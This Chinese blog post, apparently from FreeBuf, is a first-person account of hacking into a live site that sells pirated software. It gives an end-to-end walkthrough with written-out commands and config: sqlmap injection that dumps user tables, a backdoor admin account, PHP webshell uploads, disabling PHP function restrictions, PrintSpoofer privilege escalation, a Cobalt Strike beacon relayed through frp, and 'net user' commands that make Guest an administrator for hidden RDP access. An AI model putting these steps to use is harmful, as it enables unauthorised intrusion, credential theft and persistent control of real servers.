本文适合初学者看，因为内容基础，又比较啰，大佬请无视。

前言：

事情是这样，四月初有护W行动，本来想投个简历找个网安方面的工作，投了几十份简历都石沉大海，得，肯定没戏了，作为一个高中肄业的diao丝，由于学历太低，又没有什么经验，有个好心的公司电话面试了我，由于上班偷偷出来打电话，也没有准备面试题，加上电话信号不好，有点紧张，最终没通过面试。最后没一家公司鸟我，心情郁闷至极，怀疑人生。正在此时，公司一漂亮的妹子让我帮她安装一个某制图的破解软件，得知后我心情大喜，五千年终于轮到我上场，作为一个喜欢研究电脑的技术男，弄个破解软件不是手到擒来？想都没想打开某度网盘，发现已经让提示充钱了，某毒SVIP已经到期，龟速下载80KB得好几天。

看妹子焦急的心情，我不禁暗暗自喜，看妹子也不想买SVIP，也不让我买，这么体贴人的妹子想想以后娶到家岂不是贤妻良母？我直接用不花钱的办法帮她弄好岂不是让她欠个人情？嘿嘿嘿····有机会迈出第一步了，一切烦恼都烟消云散。

打开某度，搜索XX软件下载，不得不说现在网络环境真差，一不小心都安装一堆垃圾广告软件，杀毒软件都是摆设，免杀技术真强，想学。

在一次搜索中好多都是带着广告两个字，域名又臭又长，我心想：难道正版软件渠道商连个好点的域名都没注册？下图是拿医疗广告举例：

随便点开一个网站：

好家伙，随便一个软件卖70-80元，盗版当成正版卖，暴利啊，更有全站会员888元。

我推测这些都是针对中年人的，懂设计可能不懂电脑，大家都以为买了正版的软件呢。

话少说，开始渗透：

信息收集

所谓信息收集就是知己知彼，百战不殆，后面所有的渗透流程都是基于信息收集。为什么这样说？我认为如果收集的信息足够多，拿下服务器就越简单，如果收集到管理员密码还用费这么大劲渗透？

例如有一次我收集到某实验室仪器平台的RDP密码，导致实验室所有的电脑都可以随便看。

域名信息收集

判断域名对应的真实IP，如果收集到的IP是CDN服务商就开始渗透岂不是白忙活？

http://ping.chinaz.com/

各地ping IP地址都一样，这个黑产项目很明显没有CDN，真实ip就是它。

子域名收集：

子域名收集：

一般主站防御都比较好，但是子域名可能防御差点，以子域名作为突破点往往会得到意想不到的惊喜。

推荐layer子域名挖掘机，速度快，操作简单。

此站相反，以主域名作为幌子，弄个模板什么内容，子域名却干这些见不得光的事。

网站指纹识别

识别出相应的Web容器或者CMS才能查找相关的漏洞，例如直接Google “XXCMS“漏洞实在找不到就搭建一个相同的环境自己挖洞呗，反正我没这个本事，不然也不至于找不到工作。

• BugScaner：http://whatweb.bugscaner.com/look/
• 云悉指纹：http://www.yunsee.cn/finger.html
• WhatWeb：https://whatweb.net/

识别出来此站是thinkphp3.1.3

端口扫描

一般我会用nmap，扫描服务器开放的端口，找到对应的服务，对应的服务找对应的漏洞。

Google 搜索 常见危险端口服务及对应的漏洞 有一大串， 这里不一一复制过来了

• 22——>ssh—弱口令
• 3389—–>远程桌面
• 3306——>mysql—弱口令

网站敏感目录和文件

后台管理：爆破弱口令，sql注入XSS等等

压缩包：网站源码

phpinfo：各种配置都会显示出来

上传目录：上传图片马等等各种绕过

mysql管理：爆破弱口令，脱裤，getshell等

本次用的是御剑：

这次有惊喜，扫到了一个zip文件，是 以域名命名的压缩包，不出意外应该是网站整站的压缩包，估计是管理员忘了删除，不管了，先下载着。

扫到了一个后台登录地址：

发现验证码可以绕过

尝试用抓包BP爆破：

发送到intrder

好家伙~~跑了几千个没跑出来

漏洞扫描工具：

AWVS

APPSCAN

NESSUS

Burpsuite Pro

本次用的AWVS，不过只扫描了几个反射型XSS，感觉没什么用，不过好像有个数据库备份文件，肯定是好东西。

这个实际是网站压缩包，并不是数据库备份文件，和扫描目录的压缩包是同一个。

另外测试的时候发现一个支付逻辑漏洞

价格改为0.01

弹出二维码后微信扫码 显示可以付款0.01元

由于本人最近手头紧 这0.01元我也没舍得付款。

下载了网站的zip文件，二话不说直接解压（怕毒建议虚拟机），看看有没有网站的后台密码。

经过一会的查找，并没有发现后台密码，估计是保存在了数据库里面，压缩包并没有数据库，但是发现了数据库名字和密码

这么强的密码 爆破到猴年马月也出不来。

赶紧打开Navicat for mysql 登录

管理员禁止了远程登录，靠 这安全意识有点强。

漏洞利用：

只扫到几个反射性XSS 也没啥用，这事我也不想放弃。

各种扫描工具也扫不出来什么，网上大佬说拿到网站源码 就开始代码审计

连php都不会的我，代码审计简直不可想象。

由于不知道什么是代码审计，打开Google 各种搜，最终决定用Seay源代码审计系统

这玩意不会用，硬着头皮直接上

经过2分钟的认真学习（瞎几把乱点）发现了好多漏洞提示。

代码审计系统提示存在sql注入漏洞，那就试试吧

随便选个日期 加个单引号 还真报错了，想到这里为什么漏扫工具扫不出来呢？

下载次数为0，但是总下载量为23W？开着百度推广，不符合商业逻辑呀，这里估计代码有错。

很明显网站没有WAF，如果有在我输入单引号的时候就被拦截了。

二话不说直接上sqlmap就是一顿扫

数据库名shop

查询tables :   sqlmap -u “xxxxxxx.php?id=20201” -D shop –tables

查询columns,猜测后台登录密码在index_user里面

sqlmap -u “xxxxxxx.php?id=20201” -D shop -T index_user –columns

接下来就是脱裤了

很明显用户名密码都在里面

sqlmap -u “xxxxxxx.php?id=20201” -D shop  -T index_user  -C “name,password,secret,username” –dump

不知道加密方式 ，丢到反查网站，这几个密码一个都解不出 数据库这么强的密码 后台密码应该也是很强的密码

看来sql注入拿网站后台密码的办法不行，换一种思路。

判断一下是不是管理员权限，如果是的话直接sqlmap写入一句话木马

sqlmap -u “xxxxxxx.php?id=20201” –is-dba

测试了一下权限太低 看来不是DBA，看来写入一句话是没希望了

查看源文件发现有个文件叫dbm.php

简介 Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库

搜了一圈这个版本还真没有什么漏洞，之前的任意文件读取漏洞已经被修复了。

服务器禁止远程登录，那么在这里不就是本地了吗反正已经拿到数据库密码了

网站数据库没有什么东西 后台密码也解不出来 没办法登录

不过发现这个东西有个新建数据，那么我直接添加一个用户密码 不就直接登录后台了吗

说干就干，直接添加一个用户密码

直接登录，打开首页我就吓了一跳。

好家伙，我他妈直接好家伙，26天销售额将近30W，平均一天一万多 一年就是300W，一本万利的生意，说实话我羡慕了，更重要的是相同的站点还有10来个，不敢想象。

看到微信支付宝接口，说实话我有点想法。

网站源代码也有，自己弄个站，这平均一天 赶上我2个月的工资了，要是我做这个有钱了女神不是很轻松拿下？如果做站群的话用屁股想想都能挣大钱，一阵美好的幻想后这利润吓得我回到现实，赶紧看看《刑法》压压惊。

《中华人民共和国刑法》

第二百一十七条　【侵犯著作权罪】以营利为目的，有下列侵犯著作权情形之一，违法所得数额较大或者有其他严重情节的，处三年以下有期徒刑或者拘役，并处或者单处罚金；违法所得数额巨大或者有其他特别严重情节的，处三年以上七年以下有期徒刑，并处罚金

好吧我放弃做黑产这个想法了，女神好像更远了。

下一步Getshell

不想getshell的脚本小子不是好的脚本小子。

目前getshell思路就是上传一句话木马，然后提权getsystem，CS上线，维持权限。

找到一处上传点，实测没有进行任何过滤，PHP文件就能直接上传。

既然没有过滤，蚁剑，冰蝎，哥斯拉统统都搞上 主要是测试哪个好用。

（后来实测冰蝎V3.0 beta9容易卡死，哥斯拉还好但是中文乱码）

冰蝎：

哥斯拉：

直接进入shell   上来就是 whoami

发现报错，哥斯拉 冰蝎都是一样的错。

这时候又翻了一下phpinfo

看到好多函数都被禁用了，exe都运行不了我的马儿也跑不起来啊。

现在的办法只能找到PHP配置文件把这些函数都开启，如果没权限改怎么办？

好在我看到了R/W 这不就是可以读写吗

找到php.ini

把一些函数都删除 然后保存一下就可以改了，服务器都不用重启，实测冰蝎需要重启软件才生效，哥斯拉不用。

接下来提权：在Windows 10和服务器2016/2019上滥用SeImpersonatePrivilege从本地/网络服务到系统

PrintSpoofer 下载地址

https://github.com/itm4n/PrintSpoofer

具体演示和使用方式GitHub有

由于下载的是64位的 我命令为64.exe

使用方法就是：绝对路径+ -i -c +命令（有空格的话要加上双引号）

一切顺利。

cs上线

由于本人比较穷，为了演示CS上线不得不花35大洋买了一个月的服务器，换了好几个国家才最终可以ping通，原因你懂的。

听大佬说把CS直接部署在服务器容易被fofa等网络测绘工具识别到，更容易被大佬日。这次采用frp内网穿透的办法，把CS服务端部署在kali虚拟机，这样安全些，折腾这个用了我2天时间，主要是服务器原因，网速可以，但就是总是掉线，几秒掉一次，最终换了好几台服务器才可以稳定上线。

配置参考：

https://blog.csdn.net/qq_41728581/article/details/114385054

先部署FRP服务：

服务端配置：

基本上不用改，这里我开启了面板，是为了方便查看。

启动：

./frps -c ./frps.ini

客户端的配置：

[common]
server_addr = x.x.x.x
server_port = 7000
[CS_Server_9050]
type = tcp
local_ip = 127.0.0.1
local_port = 50050
remote_port = 9050
[test_Beacon_9080]
type = tcp
local_ip = 127.0.0.1
local_port = 9080
remote_port = 9080

注意：虚拟机要先启动CS服务端， 在启动frp客户端，如果顺序错了连接不上。

kali启动CS服务端：

kali启动frp 客户端：

Windows10 启动CS客户端:

注意这里要填写公网服务器的IP地址和端口即9050端口

创建监听器：ip都填写公网服务器IP 端口为9080（9080为becon） 名字随便写，paylaod 选择beacon http

冰蝎上传CS生成的木马：

直接用提权工具运行我们的木马

命令如上图，提权工具绝对路径 -i -c 木马.exe

“您好您有新的主机上线”

看到system*的感觉和看到女神一样，心动的感觉~

这台主机就是我们的了，现在可以为所欲为

不过我们的木马没有免杀，随便一个杀毒软件就可以直接干死

激活一下guest账户 并加入到administrator 账户

激活guest账户是为了用远程桌面链接，如果用administrator账户直接登陆的话有风险，万一管理员在线，我们直接登录就会把管理员挤掉，这样就被发现了。

net user guest /active:yes
将对方的Guest用户激活

net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

net localgroup administrators guest /add

远程桌面登录：

注意对方计算机的用户名一定要输入 后面再加上\Guest

至此结束~

分析：网站管理员密码意识还算强，密码都是强密码，由于网站泄露了网站源代码导致数据库密码被发现，从而轻松到后台上传木马，进而Getshell。但是管理员没有对系统打补丁，没有安装waf，也没有杀毒软件，这样大大降低了我们的攻击成本。

后记：女神回家相亲了，她和朋友谈话中说怎么也得找个工资比她高，起码本科学历，不然没有共同语言，我现在这工资还没女神高，难怪平时都不正眼看我一下，我撅腚了，从今好好学渗透，找个工作，趁早离开这个地方，excited~~

来源：freebuf.com 2021-04-28 00:09:12 by: DDFreeBuf